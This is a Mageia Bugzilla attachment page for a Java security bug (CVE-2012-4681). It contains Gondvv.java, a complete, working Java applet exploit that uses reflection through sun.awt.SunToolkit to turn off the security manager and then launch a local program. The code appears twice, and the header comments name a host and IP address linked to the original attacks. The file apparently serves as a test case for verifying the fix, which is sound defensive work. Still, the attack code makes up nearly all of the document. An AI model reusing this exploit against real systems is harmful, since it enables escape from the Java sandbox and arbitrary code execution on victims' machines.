Mageia Bugzilla – Attachment 2770 Details for
Bug 7278
java-1.7.0-openjdk new security issue CVE-2012-4681
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
Gondvv.java
Gondvv.java (text/plain), 2.61 KB, created by
Dave Hodgins
on 2012-09-08 18:48:06 CEST
(
hide
)
Description:
Gondvv.java
Filename:
MIME Type:
Creator:
Dave Hodgins
Created:
2012-09-08 18:48:06 CEST
Size:
2.61 KB
patch
obsolete
>// >// CVE-2012-XXXX Java 0day >// >// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html >// >// secret host / ip : ok.aa24.net / 59.120.154.62 >// >// regurgitated by jduck >// >// probably a metasploit module soon... >// >// package cve2012xxxx; > >import java.applet.Applet; >import java.awt.Graphics; >import java.beans.Expression; >import java.beans.Statement; >import java.lang.reflect.Field; >import java.net.URL; >import java.security.*; >import java.security.cert.Certificate; > >public class Gondvv extends Applet >{ > > public Gondvv() > { > } > > public static void disableSecurity() > throws Throwable > { > Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]); > Permissions localPermissions = new Permissions(); > localPermissions.add(new AllPermission()); > ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions); > AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] { > localProtectionDomain > }); > SetField(Statement.class, "acc", localStatement, localAccessControlContext); > localStatement.execute(); > } > > private static Class GetClass(String paramString) > throws Throwable > { > Object arrayOfObject[] = new Object[1]; > arrayOfObject[0] = paramString; > Expression localExpression = new Expression(Class.class, "forName", arrayOfObject); > localExpression.execute(); > return (Class)localExpression.getValue(); > } > > private static void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2) > throws Throwable > { > Object arrayOfObject[] = new Object[2]; > arrayOfObject[0] = paramClass; > arrayOfObject[1] = paramString; > Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject); > localExpression.execute(); > ((Field)localExpression.getValue()).set(paramObject1, paramObject2); > } > > public static void main(String[] args) { > try > { > disableSecurity(); > Process localProcess = null; > localProcess = Runtime.getRuntime().exec("/usr/bin/kcalc"); > if(localProcess != null); > localProcess.waitFor(); > } > catch(Throwable localThrowable) > { > localThrowable.printStackTrace(); > } > } > > public void paint(Graphics paramGraphics) > { > paramGraphics.drawString("Loading", 50, 25); > } >} >
// // CVE-2012-XXXX Java 0day // // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html // // secret host / ip : ok.aa24.net / 59.120.154.62 // // regurgitated by jduck // // probably a metasploit module soon... // // package cve2012xxxx; import java.applet.Applet; import java.awt.Graphics; import java.beans.Expression; import java.beans.Statement; import java.lang.reflect.Field; import java.net.URL; import java.security.*; import java.security.cert.Certificate; public class Gondvv extends Applet { public Gondvv() { } public static void disableSecurity() throws Throwable { Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]); Permissions localPermissions = new Permissions(); localPermissions.add(new AllPermission()); ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions); AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] { localProtectionDomain }); SetField(Statement.class, "acc", localStatement, localAccessControlContext); localStatement.execute(); } private static Class GetClass(String paramString) throws Throwable { Object arrayOfObject[] = new Object[1]; arrayOfObject[0] = paramString; Expression localExpression = new Expression(Class.class, "forName", arrayOfObject); localExpression.execute(); return (Class)localExpression.getValue(); } private static void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2) throws Throwable { Object arrayOfObject[] = new Object[2]; arrayOfObject[0] = paramClass; arrayOfObject[1] = paramString; Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject); localExpression.execute(); ((Field)localExpression.getValue()).set(paramObject1, paramObject2); } public static void main(String[] args) { try { disableSecurity(); Process localProcess = null; localProcess = Runtime.getRuntime().exec("/usr/bin/kcalc"); if(localProcess != null); localProcess.waitFor(); } catch(Throwable localThrowable) { localThrowable.printStackTrace(); } } public void paint(Graphics paramGraphics) { paramGraphics.drawString("Loading", 50, 25); } }
View Attachment As Raw
Actions:
View
Attachments on
bug 7278
: 2770